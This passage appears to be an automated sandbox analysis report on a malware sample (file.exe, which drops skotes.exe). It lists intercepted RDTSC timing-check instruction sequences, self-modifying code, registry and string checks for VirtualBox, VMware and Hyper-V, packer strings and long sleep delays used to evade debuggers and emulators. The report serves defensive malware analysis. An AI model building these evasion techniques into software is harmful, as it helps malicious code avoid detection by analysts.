0x00000054 movzx eax, di 0x00000057 call 00007FD0F8CDABF9h 0x0000005c pop eax 0x0000005d popad 0x0000005e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80A74 second address: 4E80ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 mov dx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FD0F8E1A7B7h 0x00000016 xor cl, FFFFFFCEh 0x00000019 jmp 00007FD0F8E1A7B9h 0x0000001e popfd 0x0000001f mov ah, BCh 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80ABC second address: 4E80AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80AC2 second address: 4E80AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80AC6 second address: 4E80B28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD0F8CDABF1h 0x00000013 or cx, 2866h 0x00000018 jmp 00007FD0F8CDABF1h 0x0000001d popfd 0x0000001e movzx esi, di 0x00000021 popad 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FD0F8CDABF6h 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80B28 second address: 4E80B4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov ecx, edx 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007FD0F8E1A7ACh 0x00000014 xchg eax, ebx 0x00000015 pushad 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80B4E second address: 4E80B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push dword ptr [ebp+14h] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop ebx 0x0000000e movzx eax, bx 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80B60 second address: 4E80BCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0F8E1A7B2h 0x00000009 adc si, 1F28h 0x0000000e jmp 00007FD0F8E1A7ABh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FD0F8E1A7B8h 0x0000001a or ecx, 10CD5188h 0x00000020 jmp 00007FD0F8E1A7ABh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push dword ptr [ebp+10h] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FD0F8E1A7B5h 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80C38 second address: 4E80C65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8CDABEDh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80C65 second address: 4E80C7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esp, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8E1A7ABh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80C7C second address: 4E80C82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80C82 second address: 4E80C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7188C2 second address: 7188C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90DC3 second address: 4E90E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD0F8E1A7B0h 0x0000000f push eax 0x00000010 jmp 00007FD0F8E1A7ABh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FD0F8E1A7B4h 0x0000001d and cx, 1A38h 0x00000022 jmp 00007FD0F8E1A7ABh 0x00000027 popfd 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FD0F8E1A7ABh 0x00000032 sub eax, 3153E7FEh 0x00000038 jmp 00007FD0F8E1A7B9h 0x0000003d popfd 0x0000003e movzx eax, bx 0x00000041 popad 0x00000042 pop ebp 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007FD0F8E1A7B9h 0x0000004a sbb ax, FCE6h 0x0000004f jmp 00007FD0F8E1A7B1h 0x00000054 popfd 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90B53 second address: 4E90B68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90B68 second address: 4E90B8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8E1A7ADh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90B8D second address: 4E90B9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABECh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90B9D second address: 4E90C31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD0F8E1A7B9h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007FD0F8E1A7AEh 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a jmp 00007FD0F8E1A7AEh 0x0000001f push eax 0x00000020 pushfd 0x00000021 jmp 00007FD0F8E1A7B1h 0x00000026 xor eax, 2C040436h 0x0000002c jmp 00007FD0F8E1A7B1h 0x00000031 popfd 0x00000032 pop eax 0x00000033 popad 0x00000034 pop ebp 0x00000035 pushad 0x00000036 movsx edi, cx 0x00000039 push eax 0x0000003a push edx 0x0000003b call 00007FD0F8E1A7B4h 0x00000040 pop esi 0x00000041 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10D65 second address: 4F10D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10D6B second address: 4F10D90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx eax, di 0x0000000d mov ch, dl 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FD0F8E1A7ACh 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10D90 second address: 4F10DAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10DAD second address: 4F10DBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov eax, edi 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10DBD second address: 4F10DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F101BA second address: 4F101BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F101BE second address: 4F101D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F101D3 second address: 4F101E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7ACh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F101E3 second address: 4F101E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10045 second address: 4F100C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ah, bl 0x0000000d pushfd 0x0000000e jmp 00007FD0F8E1A7B8h 0x00000013 add esi, 7D1878D8h 0x00000019 jmp 00007FD0F8E1A7ABh 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FD0F8E1A7B2h 0x00000029 xor esi, 55C14338h 0x0000002f jmp 00007FD0F8E1A7ABh 0x00000034 popfd 0x00000035 push esi 0x00000036 pop edi 0x00000037 popad 0x00000038 popad 0x00000039 mov ebp, esp 0x0000003b pushad 0x0000003c mov bx, 73B2h 0x00000040 push eax 0x00000041 push edx 0x00000042 mov ebx, 447C22ACh 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0101 second address: 4EA0172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FD0F8CDABEEh 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FD0F8CDABEDh 0x0000001a and al, 00000036h 0x0000001d jmp 00007FD0F8CDABF1h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007FD0F8CDABF0h 0x00000029 or ecx, 07E63F58h 0x0000002f jmp 00007FD0F8CDABEBh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0172 second address: 4EA018A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA018A second address: 4EA018E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1042B second address: 4F10465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD0F8E1A7B8h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10465 second address: 4F10469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10469 second address: 4F1046F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1046F second address: 4F104BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 mov di, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD0F8CDABF5h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FD0F8CDABECh 0x00000019 sub cx, 7B58h 0x0000001e jmp 00007FD0F8CDABEBh 0x00000023 popfd 0x00000024 mov edi, esi 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov si, dx 0x0000002f mov cl, bl 0x00000031 popad 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F104BE second address: 4F104FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0F8E1A7ABh 0x00000009 jmp 00007FD0F8E1A7B3h 0x0000000e popfd 0x0000000f mov dx, si 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push dword ptr [ebp+0Ch] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD0F8E1A7ACh 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F104FA second address: 4F10509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10509 second address: 4F10521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10521 second address: 4F1054C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD0F8CDABF5h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F105CA second address: 4F105D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F105D0 second address: 4F105E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx eax, al 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop edi 0x00000010 push esi 0x00000011 pop ebx 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F105E3 second address: 4F105E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F105E9 second address: 4F105ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F105ED second address: 4F105F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F105F1 second address: 4F10600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10600 second address: 4F10604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10604 second address: 4F10608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10608 second address: 4F1060E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1060E second address: 4F10614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB057A second address: 4EB0594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0594 second address: 4EB05AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB05AF second address: 4EB05B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB05B4 second address: 4EB05DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, si 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD0F8CDABF6h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB05DA second address: 4EB05E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB05E0 second address: 4EB05E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB05E6 second address: 4EB05EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB05EA second address: 4EB0606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD0F8CDABEEh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0606 second address: 4EB060C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB060C second address: 4EB0630 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FD0F8CDABE9h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 movsx ebx, ax 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0738 second address: 4EB073E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB073E second address: 4EB075B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABF9h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB075B second address: 4EB07C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000000h] 0x0000000e jmp 00007FD0F8E1A7ADh 0x00000013 nop 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FD0F8E1A7ACh 0x0000001b and ch, 00000058h 0x0000001e jmp 00007FD0F8E1A7ABh 0x00000023 popfd 0x00000024 mov ah, 1Ah 0x00000026 popad 0x00000027 push eax 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FD0F8E1A7B0h 0x0000002f sbb ecx, 6F439FB8h 0x00000035 jmp 00007FD0F8E1A7ABh 0x0000003a popfd 0x0000003b push eax 0x0000003c push edx 0x0000003d mov ax, 8185h 0x00000041 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB07C2 second address: 4EB0821 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD0F8CDABF2h 0x00000008 sbb cx, 5A18h 0x0000000d jmp 00007FD0F8CDABEBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 nop 0x00000017 jmp 00007FD0F8CDABF6h 0x0000001c sub esp, 1Ch 0x0000001f pushad 0x00000020 jmp 00007FD0F8CDABEEh 0x00000025 push eax 0x00000026 mov si, bx 0x00000029 pop edx 0x0000002a popad 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov ah, 56h 0x00000031 popad 0x00000032 rdtsc
                    Tries to evade debugger and weak emulator (self modifying code)
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 73579F instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 796594 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 96579F instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 9C6594 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04F10566 rdtsc 0_2_04F10566
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1216Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 472Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1208Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1215Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8124Thread sleep count: 1216 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8124Thread sleep time: -2433216s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080Thread sleep count: 472 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080Thread sleep time: -14160000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8120Thread sleep count: 1208 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8120Thread sleep time: -2417208s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7176Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8112Thread sleep count: 1215 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8112Thread sleep time: -2431215s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                    Source: skotes.exe, skotes.exe, 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: file.exe, 00000000.00000003.1433845243.00000000011B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000005.00000002.2657383555.0000000000D28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: file.exe, 00000000.00000002.1463759755.00000000006EE000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1497859902.000000000091E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.1507190175.000000000091E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
